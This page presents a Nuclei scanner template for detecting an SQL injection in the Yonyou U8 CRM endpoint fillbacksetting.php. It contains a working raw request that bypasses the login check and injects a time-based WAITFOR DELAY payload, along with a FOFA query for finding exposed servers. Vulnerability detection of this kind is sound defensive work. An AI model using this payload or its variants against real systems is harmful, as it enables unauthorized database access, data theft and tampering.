Skip to content

UFIDA U8 CRM fillbacksetting.php - SQL Injection

ID: yonyou-u8-crm-tb-sqli

Severity: high

Author: s4e-io

Tags: yonyou,u8-crm,sqli

UFIDA U8-CRM system /config/fillbacksetting.php contains an SQL injection vulnerability, which allows attackers to manipulate the database through maliciously constructed SQL statements, resulting in data leaks, tampering or destruction, and seriously threatening system security.

id: yonyou-u8-crm-tb-sqli
info:
name: UFIDA U8 CRM fillbacksetting.php - SQL Injection
author: s4e-io
severity: high
description: |
UFIDA U8-CRM system /config/fillbacksetting.php contains an SQL injection vulnerability, which allows attackers to manipulate the database through maliciously constructed SQL statements, resulting in data leaks, tampering or destruction, and seriously threatening system security.
reference:
- https://github.com/wy876/POC/blob/main/%E7%94%A8%E5%8F%8BOA/%E7%94%A8%E5%8F%8BU8-CRM%E7%B3%BB%E7%BB%9Ffillbacksetting.php%E5%AD%98%E5%9C%A8SQL%E6%B3%A8%E5%85%A5%E6%BC%8F%E6%B4%9E.md
metadata:
verified: true
max-request: 1
fofa-query: title="用友U8CRM"
tags: yonyou,u8-crm,sqli
http:
- raw:
- |
@timeout 20s
GET /config/fillbacksetting.php?DontCheckLogin=1&action=delete&id=-99;WAITFOR+DELAY+'0:0:6'-- HTTP/1.1
Host: {{Hostname}}
Cookie: PHPSESSID=bgsesstimeout-;
matchers:
- type: dsl
dsl:
- 'duration>=6'
- 'contains(body, "{\"success\":true}")'
- 'status_code == 200'
condition: and
# digest: 4a0a00473045022055f341ff106f0a2f05f872557a4ca41157e223c5d040b66e0e7e42a19dbb7744022100b0a1dcaeed3af42abb0ca62f71c18cca21259563cadf4ecee472cd6ef0420d9d:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/vulnerabilities/yonyou/yonyou-u8-crm-tb-sqli.yaml"

View on Github